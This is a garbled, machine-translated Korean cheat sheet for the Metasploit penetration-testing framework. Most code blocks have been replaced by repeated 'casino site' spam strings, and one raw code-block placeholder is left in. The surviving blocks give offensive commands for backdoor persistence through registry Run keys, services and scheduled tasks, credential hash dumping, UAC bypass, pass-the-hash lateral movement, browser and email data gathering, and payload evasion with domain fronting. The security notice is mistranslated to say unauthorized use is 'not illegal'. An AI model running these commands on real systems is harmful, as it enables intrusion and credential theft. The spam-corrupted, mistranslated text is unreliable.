콘텐츠로 이동

Metasploit Framework 열 시트

제품정보

Metasploit Framework는 Rapid7에 의해 개발 된 세계에서 가장 널리 사용되는 침투 테스트 프레임 워크입니다. 2003년 H.D. Moore에 의해 만들어진 Metasploit는 악용 개발, 취약성 검증 및 침투 테스트를 위해 de facto 표준으로 진화했습니다. 프레임 워크는 원격 대상 기계에 대한 개발, 테스트 및 실행 악용 코드를 위한 포괄적 인 플랫폼을 제공합니다. 보안 전문가, 침투 테스터 및 빨간색 팀 운영자를위한 통합 도구.

Metasploit의 모듈 아키텍처는 다양한 방법으로 정교한 공격 시나리오를 만들 수있는 악용, 페이로드, 인코딩, nops 및 보조 모듈로 구성됩니다. 프레임 워크는 명령 줄 msfconsole, 웹 기반 인터페이스 및 기타 보안 도구와 통합을위한 다양한 API를 포함한 여러 인터페이스를 지원합니다. 2,000개 이상의 악용과 500개의 페이로드를 통해 Metasploit는 다양한 운영 체제, 애플리케이션 및 네트워크 서비스 전반에 걸쳐 보안 취약성을 테스트하는 광범위한 적용을 제공합니다.

프레임 워크의 강점은 광범위한 악용 데이터베이스뿐만 아니라 페이로드 세대 기능, 포스트 폭발성 모듈 및 증발 기술에서도 사용됩니다. Metasploit는 보안 전문가가 실제 공격, 검증된 보안 컨트롤을 시뮬레이션하고 이해 관계자에게 취약점의 영향을 보여줍니다. 다른 보안 도구와 통합 및 광범위한 문서는 사이버 보안 분야에서 초보자와 고급 실무자 모두에게 접근 할 수 있습니다.

설치하기

Kali Linux 설치

Metasploit는 Kali Linux에서 사전 설치되며 패키지 관리자를 사용하여 업데이트 할 수 있습니다.

카지노사이트

Ubuntu/Debian 설치

카지노사이트

센트로/RHEL 설치하기

카지노사이트

Docker 설치

카지노사이트

Windows 설치

카지노사이트

macOS 설치

카지노사이트

기본 사용

Metasploit 시작하기 회사 소개

카지노사이트

Database 관리

카지노사이트

기본 콘솔 명령

카지노사이트

핵심 명령

검색 및 정보

카지노사이트

모듈 선택 및 구성

ο 회원 관리

Target 및 Payload 관리

카지노사이트

폭발 작업 흐름

Basic Exploitation 프로세스

카지노사이트

고급 Exploitation 기술

카지노사이트

Multi-Target 폭발

카지노사이트

Payload 생성

MSFVenom Payload 생성

카지노사이트

Payloads를 인코딩

카지노사이트

사용자 정의 템플릿 및 형식

카지노사이트

플랫폼 Specific Payloads

카지노사이트

세션 관리

기본 세션 명령

오프화이트

세션 Interaction

카지노사이트

고급 세션 관리

오프화이트

Meterpreter 명령

시스템 정보

카지노사이트

파일 시스템 운영

카지노사이트

공정관리

카지노사이트

네트워크 운영

카지노사이트

레지스트리 운영 (Windows)

카지노사이트

Credential 운영

카지노사이트

회사 소개

```bash

Create persistent backdoor

use exploit/windows/local/persistence set SESSION 1 set STARTUP SYSTEM run

Registry persistence

reg setval -k HKLM\Software\Microsoft\Windows\CurrentVersion\Run -v Backdoor -t REG_SZ -d "C:\Windows\Temp\backdoor.exe"

Service persistence

use post/windows/manage/persistence_exe set SESSION 1 set REXEPATH C:\Windows\Temp\backdoor.exe run

Scheduled task persistence

execute -f schtasks.exe -a "/create /tn Backdoor /tr C:\Windows\Temp\backdoor.exe /sc onlogon" ```의 경우

포스트 폭발 모듈

정보 수집

```bash

System enumeration

use post/windows/gather/enum_system use post/linux/gather/enum_system set SESSION 1 run

Network enumeration

use post/windows/gather/enum_domain use post/windows/gather/enum_shares use post/linux/gather/enum_network set SESSION 1 run

Credential gathering

use post/windows/gather/credentials/credential_collector use post/windows/gather/smart_hashdump use post/linux/gather/hashdump set SESSION 1 run

Application enumeration

use post/windows/gather/enum_applications use post/windows/gather/enum_chrome use post/windows/gather/enum_firefox set SESSION 1 run

File enumeration

use post/windows/gather/enum_files use post/multi/gather/find_files set SESSION 1 set SEARCH_FROM C:\ set FILE_GLOBS .txt,.doc,*.pdf run ```에 대하여

Privilege 확장

```bash

Windows privilege escalation

use post/windows/escalate/getsystem use post/windows/escalate/bypassuac use post/windows/escalate/bypassuac_injection set SESSION 1 run

Linux privilege escalation

use post/linux/escalate/cve_2021_4034 use post/linux/escalate/sudo_baron_samedit set SESSION 1 run

Suggest privilege escalation

use post/multi/recon/local_exploit_suggester set SESSION 1 run

UAC bypass

use exploit/windows/local/bypassuac_comhijack use exploit/windows/local/bypassuac_fodhelper set SESSION 1 run ```의 경우

옆 운동

```bash

Pass the hash

use exploit/windows/smb/psexec set RHOSTS 192.168.1.100 set SMBUser Administrator set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 run

WMI execution

use exploit/windows/local/wmi set SESSION 1 set RHOSTS 192.168.1.100 run

PowerShell remoting

use exploit/windows/local/powershell_remoting set SESSION 1 set RHOSTS 192.168.1.100 run

SSH lateral movement

use auxiliary/scanner/ssh/ssh_login set RHOSTS 192.168.1.0/24 set USERNAME root set PASSWORD password run ```에 대하여

자료 Exfiltration

```bash

File collection

use post/multi/gather/find_files set SESSION 1 set SEARCH_FROM C:\Users set FILE_GLOBS .doc,.pdf,.txt,.xls run

Browser data

use post/windows/gather/enum_chrome use post/windows/gather/enum_firefox use post/windows/gather/enum_ie set SESSION 1 run

Email data

use post/windows/gather/outlook use post/windows/gather/thunderbird_creds set SESSION 1 run

Database enumeration

use auxiliary/admin/mssql/mssql_enum use auxiliary/admin/mysql/mysql_enum set SESSION 1 run ```의 경우

Persistence와 뒷문

카지노사이트

보조 모듈

회사연혁

카지노사이트

Brute 힘 공격

카지노사이트

서비스 제공

카지노사이트

SNMP 축소

카지노사이트

Database 통합

Workspace 관리

카지노사이트

호스트 및 서비스 관리

```bash

Add hosts

db_import /path/to/nmap_scan.xml hosts

Add host manually

hosts -a 192.168.1.100 -n target1 -o "Windows 10"

Show hosts

hosts hosts -c address,name,os_name

Search hosts

hosts 192.168.1.0/24 hosts -S windows

Delete hosts

hosts -d 192.168.1.100

Add services

services -a -p 80 -s http -h 192.168.1.100

Show services

services services -p 80 services -s http

Delete services

services -d -p 80 -h 192.168.1.100 ```의 경우

Vulnerability 관리

```bash

Show vulnerabilities

vulns

Add vulnerability

vulns -a -h 192.168.1.100 -n "MS17-010" -r "CVE-2017-0144"

Search vulnerabilities

vulns -S ms17-010

Show vulnerability details

vulns -v

Export vulnerabilities

vulns -O /tmp/vulns.xml ```의 경우

Credential 관리

카지노사이트

Loot 관리

```bash

Show loot

loot

Add loot

loot -a -h 192.168.1.100 -t "password_file" -f /tmp/passwords.txt

Search loot

loot -S password

Export loot

loot -O /tmp/loot.xml ```의 경우

고급 기술

주문 모듈 개발

```ruby

Basic exploit module template

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking

include Msf::Exploit::Remote::Tcp

def initialize(info = \\{\\}) super(update_info(info, 'Name' => 'Custom Exploit', 'Description' => 'Custom exploit description', 'Author' => ['Your Name'], 'License' => MSF_LICENSE, 'References' => [['CVE', '2021-1234']], 'Platform' => 'win', 'Targets' => [['Windows Universal', \\{\\}]], 'Payload' => \\{ 'Space' => 400, 'BadChars' => "\x00\x0a\x0d" \\}, 'DisclosureDate' => '2021-01-01', 'DefaultTarget' => 0))

register_options([
  Opt::RPORT(9999)
])

end

def check # Vulnerability check logic return Exploit::CheckCode::Vulnerable end

def exploit # Exploitation logic connect print_status("Sending payload...") sock.put(payload.encoded) handler disconnect end end ```를 호출합니다.

주문 Payload 개발

```ruby

Basic payload module template

require 'msf/core'

module MetasploitModule CachedSize = 200

include Msf::Payload::Single include Msf::Payload::Windows include Msf::Payload::Windows::Exec

def initialize(info = \\{\\}) super(merge_info(info, 'Name' => 'Custom Windows Payload', 'Description' => 'Custom payload description', 'Author' => ['Your Name'], 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => ARCH_X86))

register_options([
  OptString.new('CMD', [true, "Command to execute", 'calc.exe'])
])

end

def generate # Payload generation logic | cmd = datastore['CMD'] | | 'calc.exe' | # Return shellcode end end ```의 경우

Evasion 기술

```bash

Use encoders

set ENCODER x86/shikata_ga_nai set ITERATIONS 5

Use custom templates

set TEMPLATE /path/to/legitimate.exe

Modify payload behavior

set PrependMigrate true set PrependMigrateProc explorer.exe

Use HTTPS for C2

set LHOST 192.168.1.50 set LPORT 443 set HttpsUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

Domain fronting

set HttpHostHeader legitimate-domain.com set LHOST cdn-provider.com

Custom user agents

set HttpUserAgent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"

Sleep and jitter

set WfsDelay 30 set Jitter 25 ```로

자동화 및 스크립트

카지노사이트

다른 도구와 통합

Nmap 통합

오프화이트

Burp Suite 통합

카지노사이트

Cobalt Strike 통합

__CODE_BLOCK_49_로그

OSINT 통합

카지노사이트

문제 해결

일반적인 문제 및 솔루션

```bash

Database connection issues

msfdb status msfdb reinit sudo systemctl restart postgresql

Module loading errors

reload_all updatedb

Payload generation failures

msfvenom --list formats msfvenom --list encoders msfvenom --list platforms

Session connectivity issues

sessions -l sessions -k 1 route print route flush

Permission issues

sudo chown -R $USER:$USER ~/.msf4 sudo chmod -R 755 ~/.msf4 ```를 호출합니다.

성능 최적화

```bash

Increase database performance

echo "shared_buffers = 256MB"|sudo tee -a /etc/postgresql//main/postgresql.conf echo "effective_cache_size = 1GB"|sudo tee -a /etc/postgresql//main/postgresql.conf sudo systemctl restart postgresql

Optimize threading

set THREADS 20 set MaxSessions 10

Memory optimization

ulimit -n 4096 echo " soft nofile 4096"|sudo tee -a /etc/security/limits.conf echo " hard nofile 4096"|sudo tee -a /etc/security/limits.conf

Clean up old sessions

sessions -K db_rebuild_cache ```의 경우

관련 링크

카지노사이트

보안 고려 사항

운영 보안

카지노사이트

법률 및 윤리적 고려

```bash

Document authorization

echo "Authorized penetration test - $(date)" > /tmp/authorization.txt echo "Scope: 192.168.1.0/24" >> /tmp/authorization.txt echo "Contact: security@company.com" >> /tmp/authorization.txt

Limit scope

set RHOSTS 192.168.1.100-110 # Only authorized targets set ExitOnSession true # Limit session creation

Avoid destructive actions

set DisablePayloadHandler true set PrependMigrate false ```로

데이터 보호

카지노사이트


ღ♥ღ Security Notice**: Metasploit Framework는 시스템에서 사용해야 하는 강력한 침투 테스트 도구이며, 테스트에 명시된 서면 승인이 있습니다. 시스템에 대한이 도구의 무단 사용은 불법적이지 않습니다. 항상 보안 테스트 활동을 수행하기 전에 적절한 권한이 있습니다. 이 속임수 시트는 교육 목적과 공인 보안 테스트에만 적용됩니다. 사용자는 관할 구역의 모든 적용 가능한 법률 및 규정에 따라 책임집니다.

이름 * 추가 리소스**: - Official Metasploit 문서 - Metasploit Unleashed 과정 - Rapid7 커뮤니티 - Metasploit GitHub 저장소